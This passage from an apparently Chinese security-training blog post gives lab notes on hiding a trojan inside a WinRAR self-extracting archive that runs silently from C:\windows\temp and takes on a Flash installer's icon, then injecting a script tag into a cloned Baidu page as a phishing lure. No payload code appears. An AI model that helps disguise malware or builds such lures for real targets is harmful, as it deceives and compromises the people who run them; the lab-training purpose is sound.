href="http://192.168.2.6:5244/p/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E8%BD%AF%E4%BB%B6%E5%A4%A7%E5%85%A8/winrar.zip">http://192.168.2.6:5244/p/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E8%BD%AF%E4%BB%B6%E5%A4%A7%E5%85%A8/winrar.zip</a><br>下载后解压，把解压后的WinRAR 文件移到win10hei 的桌面</p>
<ol start="3">
<li><p>双击winRAR.exe,找到flashcenter_pp_ax_install_cn和flag.exe文件</p>
</li>
<li><p>将flashcenter_pp_ax_install_cn与flag.exe放到同—文件<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701347587107-a191b8cb-e204-4e65-ad34-b3d498b3068a.png" alt="图片.png"></p>
</li>
<li><p>ctrl选中flashcenter_pp_ax_install_cn与flag.exe，点击添加，使用winrar创建压缩文件<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701347273345-369cd3e6-5a19-4040-af5a-4e7b80e3bc90.png" alt="图片.png"></p>
</li>
<li><p>高级-&gt;高级自解压选项， 路径设置 C:\windows\temp<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701347667747-db064174-9508-45c8-b63c-25b37863de80.png" alt="图片.png"></p>
</li>
<li><p>设置添加<br>C:\windows\temp\flashcenter_pp_ax_install_cn.exe<br>C:\windows\temp\flash.exe<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701347725376-ea673c92-61a1-4729-b45b-25d1e94b8729.png" alt="图片.png"><br>8.模式设置全部隐藏<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701347788321-77fc72d9-2b97-45c8-a4bf-71e5f938364d.png" alt="图片.png"></p>
</li>
<li><p>更新设置，最后点击确定，生成一个tyb.exe文件<br>10.替换图标，在主机下载安装 Restorator,链接为 <a target="_blank" rel="noopener" href="http://192.168.2.6:5244/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E8%BD%AF%E4%BB%B6%E5%A4%A7%E5%85%A8/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7/Restorator%E5%9B%BE%E6%A0%87%E4%BF%AE%E6%94%B9%E5%99%A8.rar">http://192.168.2.6:5244/%E7%BD%91%E7%9B%98/%E7%99%BE%E5%BA%A6%E7%BD%91%E7%9B%98/%E8%BD%AF%E4%BB%B6%E5%A4%A7%E5%85%A8/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7/Restorator%E5%9B%BE%E6%A0%87%E4%BF%AE%E6%94%B9%E5%99%A8.rar</a>      然后解压，把解压后的 Restorator.exe移到win10hei的桌面。<br>11.在 win10hei 的谷歌浏览器搜索flash中心，下载flashcenter_pp_ax_install_cn并保存在桌面。<br>12.把生成的 tyb.exe文件和下载的flashcenter_pp_ax_install_cn.exe文件拖进Restorator，在Restorator中删除tyb.exe的图标文件夹，复制flash的图标文件夹，粘贴到tyb.exe，点击保存。<br>13.重启win10hei。<br>14.tyb.exe的图标变成了的flash图标。双击tyb.exe出现许多苍蝇。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701348429531-fbaa3c69-a381-47ee-9d19-2c2c07de9828.png" alt="图片.png"></p>
</li>
</ol>
<h2 id="四-在网站插入js网页"><a href="#四-在网站插入js网页" class="headerlink" title="四.在网站插入js网页"></a>四.在网站插入js网页</h2><p>1.由于我生成的钓鱼网也不能访问，在百度网页下载了链接进行操作。<br>2.把下载的 百度一下，你就知道.html文件和百度一下，你就知道.file文件添加为一个压缩包，然后命名为yunqishi。将其拖入到win10hei。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701349032280-4d1480d0-9029-41c7-abbb-0586248bd882.png" alt="图片.png">3.用之前下的winRAR压缩软件解压yunqishi.zip,打开win10hei桌面上的phpstudy,开启apache, 把百度一下，你就知道.html文件和百度一下，你就知道.file这两个文件移到phpstudy的根目录上,把之前的index.html文件删掉，把百度一下，你就知道.html重命名为index.html文件。<br>4.在index.html文件插入代码： <script src="./flash.js"></script><br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701350031429-7b9f6a5e-b8a3-4959-974d-bc849c0328fd.png" alt="图片.png">5.在物理机的浏览器输入win10hei的IP地址，出现如下结果：<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1701350265769-269d0e01-c146-413e-9aa0-a5c4b18c4902.png" alt="图片.png"></p>
<h2 id=""><a href="#" class="headerlink" title=""></a></h2>
      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>Title:</span><a href="/2023/12/02/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B001/">社工库查询个人信息，永恒之黑，钓鱼攻击，flash捆绑木马，网站插入js网页</a></p>
        <p><span>Author:</span><a href="/" title="Back to Homepage"></a></p>
        <p><span>Created:</span>2023-12-02, 23:17:21</p>
        <p><span>Updated:</span>2023-12-04, 20:52:13</p>
        <p>
            <span>Full URL:</span><a class="post-url" href="/2023/12/02/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B001/" title="社工库查询个人信息，永恒之黑，钓鱼攻击，flash捆绑木马，网站插入js网页">http://example.com/2023/12/02/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B001/</a>
            <span class="copy-path" data-clipboard-text="From http://example.com/2023/12/02/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B001/　　By " title="Copy Article&#39;s Link &amp; Author"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>License:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"CC BY-NC-SA 4.0"</a> Keep Link &amp; Author if Distribute.
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2023/12/02/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B002/">
                    在物理机下载软件，利用github搭建hexo博客，验证图片上传和更换博客主题
                </a>
            </div>
        
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">Contents</strong>
        
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#day01"><span class="toc-number">1.</span> <span class="toc-text">day01</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E7%A4%BE%E5%B7%A5%E5%BA%93%E6%9F%A5%E8%AF%A2%E4%B8%AA%E4%BA%BA%E4%BF%A1%E6%81%AF"><span class="toc-number">1.1.</span> <span class="toc-text">一.社工库查询个人信息</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E6%B0%B8%E6%81%92%E4%B9%8B%E9%BB%91%E5%AE%9E%E9%AA%8C"><span class="toc-number">1.2.</span> <span class="toc-text">二.永恒之黑实验</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89-%E8%A7%82%E7%9C%8B1-x%E8%A7%86%E9%A2%91"><span class="toc-number">1.3.</span> <span class="toc-text">三.观看1-x视频</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#day02"><span class="toc-number">2.</span> <span class="toc-text">day02</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E4%BA%86%E8%A7%A3%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%8E%86%E5%8F%B2%E5%92%8C%E7%A7%8D%E7%B1%BB"><span class="toc-number">2.1.</span> <span class="toc-text">一.了解操作系统的历史和种类</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E9%92%93%E9%B1%BC%E6%94%BB%E5%87%BB"><span class="toc-number">2.2.</span> <span class="toc-text">二.钓鱼攻击</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89-%E6%8E%A7%E5%88%B6%E5%B7%A5%E5%85%B7%E5%A4%A7%E7%81%B0%E7%8B%BC%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="toc-number">2.3.</span> <span class="toc-text">三.控制工具大灰狼的使用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#day03"><span class="toc-number">3.</span> <span class="toc-text">day03</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E4%BD%BF%E7%94%A8Quasar%E8%BF%9C%E6%8E%A7%E5%B7%A5%E5%85%B7"><span class="toc-number">3.1.</span> <span class="toc-text">一.使用Quasar远控工具</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-flash%E9%A1%B5%E9%9D%A2%E5%88%B6%E4%BD%9C"><span class="toc-number">3.2.</span> <span class="toc-text">二.flash页面制作</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89-flash%E6%8D%86%E7%BB%91%E6%9C%A8%E9%A9%AC"><span class="toc-number">3.3.</span> <span class="toc-text">三.flash捆绑木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B-%E5%9C%A8%E7%BD%91%E7%AB%99%E6%8F%92%E5%85%A5js%E7%BD%91%E9%A1%B5"><span class="toc-number">3.4.</span> <span class="toc-text">四.在网站插入js网页</span></a></li><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">3.5.</span> <span class="toc-text"></span></a></li></ol></li></ol>
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-6 i,
        .toc-level-6 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="Hide"  title="Show or Hide Table of Contents">

    <script>
        yiliaConfig.toc = ["Hide", "Show", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"社工库查询个人信息，永恒之黑，钓鱼攻击，flash捆绑木马，网站插入js网页　| Hexo　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2023/12/02/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B002/" title="Pre: 在物理机下载软件，利用github搭建hexo博客，验证图片上传和更换博客主题">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="Mini Archives"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/" title="Back to Homepage"><i class="fa fa-home"></i></a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2023/12/13/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B014/">用vue写网页</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/12/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B007/">form表单，写政府网页</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B008/">vue3的使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B013/">字符集和编码</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B012/">字典</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B011/">列表，元组，set集合</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B010/">循环语句,字符串</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/10/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B009/">第一个python程序，用户交互，if条件判断</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/06/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B006/">复盘Linux命令，安装命令和工具，HTML5介绍,写一个网页</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/05/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B005/">介绍路由，代理和OSI模型，VMware workstation，wireshark</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/04/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B004/">复盘上周知识&网络基础知识</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/02/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B003/">Linux的基本命令，ssh登录</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/02/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B002/">在物理机下载软件，利用github搭建hexo博客，验证图片上传和更换博客主题</a></li><li class="post-list-item"><a class="post-list-link" href="/2023/12/02/%E5%9F%B9%E8%AE%AD%E7%AC%94%E8%AE%B001/">社工库查询个人信息，永恒之黑，钓鱼攻击，flash捆绑木马，网站插入js网页</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2016-2023 Tangxianshen
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="A fast, simple &amp; powerful blog framework">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="Another simple and elegant theme for Hexo  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="Site Visitors"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="Page Hits"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 5;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="Back to Top"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="Comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="Go to Bottom"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
</body>
</html>